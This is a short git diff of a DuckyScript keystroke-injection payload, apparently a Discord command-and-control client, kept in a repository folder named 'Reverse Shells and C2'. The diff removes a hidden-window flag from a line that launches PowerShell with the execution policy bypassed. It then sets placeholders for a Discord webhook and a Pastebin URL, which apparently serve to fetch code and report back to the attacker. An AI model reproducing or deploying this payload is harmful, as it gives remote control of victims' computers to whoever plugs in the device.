diff --git a/Reverse Shells and C2/Discord C2 Client.txt b/Reverse Shells and C2/Discord-C2-Client.txt similarity index 88% rename from Reverse Shells and C2/Discord C2 Client.txt rename to Reverse Shells and C2/Discord-C2-Client.txt index 0acd67d..2e25c00 100644 --- a/Reverse Shells and C2/Discord C2 Client.txt +++ b/Reverse Shells and C2/Discord-C2-Client.txt @@ -15,11 +15,11 @@ REM for more info goto - https://github.com/beigeworm/PoshCord-C2 REM some setup for dukie script DEFAULT_DELAY 100 -REM open powershell (remove "-W H" to show the window) +REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H +STRING powershell -NoP -Ep Bypass ENTER DELAY 5000 STRING $hookurl = 'WEBHOOK_HERE'; $ghurl = 'PASTEBIN_URL_HERE';